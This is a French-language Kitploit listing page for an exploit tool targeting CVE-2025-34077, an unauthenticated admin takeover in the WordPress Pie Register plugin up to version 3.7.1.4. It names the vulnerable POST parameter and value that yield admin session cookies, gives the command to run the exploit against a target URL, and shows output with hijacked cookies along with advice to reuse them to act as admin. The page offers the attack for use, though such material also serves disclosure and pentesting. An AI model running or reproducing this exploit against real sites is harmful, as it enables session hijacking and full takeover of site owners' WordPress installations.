Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - Escalade de privilèges Admin (Non authentifié) | Kitploit
Outils/GitHubGitHub/mrjhaxcore/cve-2025-34077
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmrjhaxcore/cve-2025-34077

CVE-2025-34077

WordPress Pie Register ≤ 3.7.1.4 - Escalade de privilèges Admin (Non authentifié)

Voir le dépôt
6343il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - Élévation de privilèges admin (non authentifié)

Exploit Status CVE Badge Python

💀 Auteur

Mrj Haxcore

🧠 Résumé de la vulnérabilité

Le plugin Pie Register pour WordPress (version ≤ 3.7.1.4) expose un point de terminaison non authentifié qui permet à un attaquant de détourner les sessions admin simplement en POSTant une charge utile spécifique.

L'exploitation permet de voler les cookies de session de l'utilisateur ID 1 (généralement admin) sans avoir besoin d'identifiants de connexion.


📦 Logiciel concerné

  • Nom du plugin : Pie Register
  • Version : <= 3.7.1.4
  • Slug du plugin : pie-register
  • Page du plugin
  • Lien de téléchargement vulnérable

📬 Paramètre vulnérable :

user_id_social_site=1 Lorsqu'il est POSTé vers l'URL racine (/), ce paramètre amène le plugin à authentifier l'attaquant en tant qu'utilisateur avec l'ID 1 (généralement admin), et à émettre des cookies de session valides.


🔧 Prérequis

  • Python 3.x
  • requests, beautifulsoup4 (optionnel, pour l'analyse des cookies)

▶️ Exécution de l'exploit

root@kitploit:~
python3 pie.py http://cible.site

---
Sortie
[*] Envoi de la charge utile pour détourner la session admin...

[+] Cookies détournés avec succès pour user_id=1 (admin) :
    wordpress_sec_xxxxxx = <valeur_du_cookie>
    wordpress_logged_in_xxxxxx = <valeur_du_cookie>

[!] Utilisez ces cookies dans votre navigateur ou des outils comme curl ou Burp pour agir en tant qu'admin.
Télécharger l’outil